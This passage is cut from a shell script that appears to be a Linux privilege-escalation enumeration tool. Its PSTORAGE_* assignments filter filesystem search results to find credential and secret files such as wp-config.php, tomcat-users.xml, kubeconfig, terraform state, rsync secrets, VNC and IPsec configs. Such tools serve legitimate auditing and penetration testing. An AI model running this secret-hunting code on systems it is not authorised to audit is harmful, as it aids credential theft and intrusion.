"$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "airflow\.cfg$|webserver_config\.py$" | sort | uniq | head -n 70) - PSTORAGE_X11=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "\.Xauthority$" | sort | uniq | head -n 70) - PSTORAGE_WORDPRESS=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "wp-config\.php$" | sort | uniq | head -n 70) - PSTORAGE_DRUPAL=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E '/default/settings.php' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "settings\.php$" | sort | uniq | head -n 70) - PSTORAGE_MOODLE=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E 'moodle/config.php' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "config\.php$" | sort | uniq | head -n 70) - PSTORAGE_TOMCAT=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70) - PSTORAGE_MONGO=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70) - PSTORAGE_ROCKETCHAT=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}lib|^${ROOT_FOLDER}systemd|^${ROOT_FOLDER}etc" | grep -E "rocketchat\.service$" | sort | uniq | head -n 70) - PSTORAGE_SUPERVISORD=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70) - PSTORAGE_CESI=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "cesi\.conf$" | sort | uniq | head -n 70) - PSTORAGE_RSYNC=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70) - PSTORAGE_RPCD=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '/init.d/|/sbin/|/usr/share/' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "rpcd$" | sort | uniq | head -n 70) - PSTORAGE_BITCOIN=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "bitcoin\.conf$" | sort | uniq | head -n 70) - PSTORAGE_HOSTAPD=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_WIFI_CONNECTIONS=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}etc" | grep -E "system-connections$" | sort | uniq | head -n 70) - PSTORAGE_PAM_AUTH=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}etc" | grep -E "pam\.d$" | sort | uniq | head -n 70) - PSTORAGE_NFS_EXPORTS=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}etc" | grep -E "exports$" | sort | uniq | head -n 70) - PSTORAGE_GLUSTERFS=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "glusterfs\.pem$|glusterfs\.ca$|glusterfs\.key$" | sort | uniq | head -n 70) - PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70) - PSTORAGE_TERRAFORM=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E ".*\.tfstate$|.*\.tf$|credentials\.tfrc\.json$" | sort | uniq | head -n 70) - PSTORAGE_RACOON=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "racoon\.conf$|psk\.txt$" | sort | uniq | head -n 70) - PSTORAGE_KUBERNETES=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "kubeconfig$|bootstrap-kubeconfig$|kubelet-kubeconfig$|kubelet\.conf$|psk\.txt$|\.kube.*$|kubelet$|kube-proxy$|kubernetes$" | sort | uniq | head -n 70) - PSTORAGE_VNC=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '/mime/' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70) - PSTORAGE_LDAP=$(echo -e 